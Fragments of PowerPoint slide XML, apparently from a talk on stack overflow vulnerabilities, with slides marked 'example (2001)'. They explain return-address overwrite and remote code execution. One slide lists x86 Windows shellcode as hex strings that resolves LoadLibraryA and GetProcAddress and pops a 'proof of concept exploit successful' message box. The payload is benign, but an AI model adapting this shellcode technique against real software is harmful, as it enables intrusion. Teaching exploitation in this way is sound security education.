                                      <p:cBhvr additive="repl">
                                        <p:cTn id="21" dur="1199" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="512"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="22" dur="1199" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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3" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680040" y="2350440"/>
            <a:ext cx="11217600" cy="3285720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>SERVER.EXE crashes because EIP == 0x43434343 ! (Denial-of-Service vulnerability)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Return address was overwritten</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="ο"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>execution flow can go to code provided in the overflowing buffer itself (the “shellcode”)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="ο"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>arbitrary code execution is possible</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="ο"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>remote code execution (“RCE”) vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632600" y="194760"/>
            <a:ext cx="11054880" cy="1198800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Stack overflow vulnerabilities: a “hello^H^Hp world!”          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>                                                                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>example (2001)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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5" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1544040" y="365760"/>
            <a:ext cx="10357920" cy="1096560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Stack overflow vulnerabilities: a “help wooo … ooorld!”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>                                                                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>example (2001)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="516" name="Content Placeholder 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3075840" y="1697760"/>
            <a:ext cx="5349240" cy="4551840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="517" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1107600">
            <a:off x="4962960" y="1340640"/>
            <a:ext cx="4195800" cy="1423440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:transition>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8" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600560" y="527400"/>
            <a:ext cx="11245320" cy="730080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Stack overflow vulnerabilities: shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>                                                                                               </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>example (2001)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757080" y="1345320"/>
            <a:ext cx="10566000" cy="4811040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x8B\x35" LoadLibraryA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x8B\x3D" GetProcAddress</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x55""\x66\x68""32""\x68""USER"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x54"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xFF\xD6"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x6A""A""\x66\x68""ox""\x68""ageB""\x68""Mess"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x54"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x50"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xFF\xD7"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x55""\x68""ING!""\x68""WARN"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x8B\xDC"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x55""\x6A""!""\x68""full""\x68""cces""\x68""t su""\x68""ploi"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x68""t ex""\x68""ncep""\x68""f co""\x68""of o""\x68"" pro"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x68""2.7x""\x68"".6x/""\x68""mp 2""\x68""Wina"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x8B\xCC"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x6A\x30"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x53"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x51"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x55"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xFF\xD0"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x55""\x68""EL32""\x68""KERN"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x54"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xFF\xD6"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x6A""s""\x66\x68""es""\x68""Proc""\x68""Exit"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x54"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x50"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xFF\xD7"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x55"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="dedede"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xFF\xD0"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="520" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5019840" y="1170360"/>
            <a:ext cx="5213160" cy="5037480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="521" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7722360" y="1345320"/>
            <a:ext cx="3924720" cy="2042280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7817760" y="1345320"/>
            <a:ext cx="3924720" cy="2042280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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